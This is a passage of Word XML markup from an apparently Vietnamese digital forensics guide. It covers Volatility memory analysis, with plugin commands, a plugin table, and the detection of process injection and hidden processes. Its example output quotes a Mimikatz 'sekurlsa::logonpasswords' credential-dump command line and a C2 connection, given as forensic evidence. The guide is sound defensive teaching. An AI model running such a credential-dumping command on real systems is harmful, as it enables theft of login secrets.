      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> vol.py </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="67"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>-f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> memory.raw windows.pslist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55"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t># Dòng lệnh của tiến trình</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="65"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>python3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> vol.py </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="67"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>-f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> memory.raw windows.cmdline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55"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t># Kết nối mạng</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="65"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>python3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> vol.py </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="67"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>-f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> memory.raw windows.netscan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1248D595">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Ví dụ:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67765745">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39"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2456  3189  cmd.exe       2026-01-14 22:40:55</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2891  2456  mimikatz.exe  2026-01-14 22:41:02</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mimikatz.exe 'privilege::debug' 'sekurlsa::logonpasswords' exit</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185.220.101.47:4444 ESTABLISHED 2891 mimikatz.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54537A9E">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Chuỗi này xác nhận Mimikatz chạy làm tiến trình con của </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="39"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>cmd.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>, thực hiện dump credential và có kết nối C2.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="35"/>
    <w:p w14:paraId="264E06AD">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="36" w:name="phát-hiện-process-injection"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>6.3. Phát hiện Process Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687AF236">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65"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>python3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> vol.py </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="67"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>-f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> memory.raw windows.malfind </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="67"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>--dump</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="65"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>python3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> vol.py </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="67"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>-f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> memory.raw windows.psscan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3489E6D5">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Ví dụ:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EE9649">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39"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>PID 1847 svchost.exe</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Protection: PAGE_EXECUTE_READWRITE</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MZ header found - Full PE injected into svchost.exe</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PID 3421 svchost.exe - NOT in pslist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB4BB9D">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Vùng nhớ RWX có header </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="39"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>MZ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> gợi ý PE bị tiêm. Tiến trình xuất hiện trong </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="39"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>psscan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> nhưng không có trong </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="39"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>pslist</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> có thể đã bị unlink bởi rootkit.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="36"/>
    <w:p w14:paraId="4B03FC0A">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="plugin-volatility-quan-trọng"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>6.4. Plugin Volatility quan trọng</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="13"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="autofit"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="10" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2910"/>
        <w:gridCol w:w="7136"/>
      </w:tblGrid>
      <w:tr w14:paraId="4C75CE56">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0885942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Plugin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="17365D"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="71543BA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Công dụng</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="10D78FF6">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8995D75">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windows.pslist</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="326B373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Danh sách tiến trình từ linked list EPROCESS; rootkit có thể thao túng.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="22522C0E">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0855A288">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windows.psscan</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="51CB05A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Quét pool để tìm mọi cấu trúc tiến trình, gồm tiến trình ẩn/unlinked.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="27E4DBDC">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2DC7A947">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windows.pstree</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7EE047C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Cây cha-con của tiến trình, giúp phát hiện quan hệ bất thường.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="038E6D11">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5965C4FF">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windows.cmdline</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="689A0B8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Tham số dòng lệnh, thường lộ switch của mã độc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6247E725">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157D6C97">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windows.malfind</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0125A4B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Tìm vùng RWX chứa PE, hỗ trợ phát hiện injection.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2F78D54C">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1DFE2850">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windows.netscan</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="68E3D77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Kết nối TCP/UDP đang hoạt động hoặc vừa đóng.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="384EB48E">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406A5564">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windows.dlllist</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4D61D1C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DLL được nạp bởi từng tiến trình, tìm DLL bị tiêm hoặc không ký.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="21153C07">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6C19E648">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windows.handles</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="347C57E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Handle mở: tệp, registry key, mutex và pipe.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1794DBAE">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637851A2">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windows.svcscan</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="23DA027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Dịch vụ Windows, tìm service độc hại.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="12A9DB26">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34B35821">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windows.registry.hivelist</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="051493C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Hive Registry đang được nạp trong RAM.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0E0AECFF">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7CAB0514">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windows.registry.printkey</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="61CA31A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Đọc giá trị registry cụ thể từ bộ nhớ.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0F48E3B6">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2372E0E7">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windows.dumpfiles</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3869B0A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Trích xuất tệp từ RAM theo PID hoặc địa chỉ.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="25E32F29">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72D02F49">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windows.yarascan</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="37BB040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Chạy YARA trên RAM để săn chữ ký mã độc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5F8430D0">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44AF2527">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windows.strings</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="524B79D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Tìm chuỗi cụ thể phục vụ săn IOC.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="53182F04">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6B6FF302">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windows.filescan</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="54F7409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Tìm đối tượng tệp, kể cả handle volume mã hóa.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2D41F1FC">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244D1426">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linux.pslist</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="24C8D56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Danh sách tiến trình Linux.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="16F2BAB4">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54A50C8E">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linux.bash</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="50544A7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Phục hồi lệnh bash từ bộ nhớ.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="55E9A95D">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06CD32E9">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linux.netstat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4111275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Kết nối mạng Linux trong RAM.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7B0331C7">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:spacing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Chứng cứ quan trọng:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Lịch sử bash có thể được phục hồi từ RAM sau khi kẻ tấn công chạy </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="39"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>history -c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>, miễn là cấu trúc history buffer vẫn còn tại thời điểm thu thập.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="33"/>
    <w:bookmarkEnd w:id="37"/>
    <w:p w14:paraId="1B541058">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext/>
        <w:pageBreakBefore/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="pháp-chứng-mạng"/>
      <w:r>
        <w:rPr>
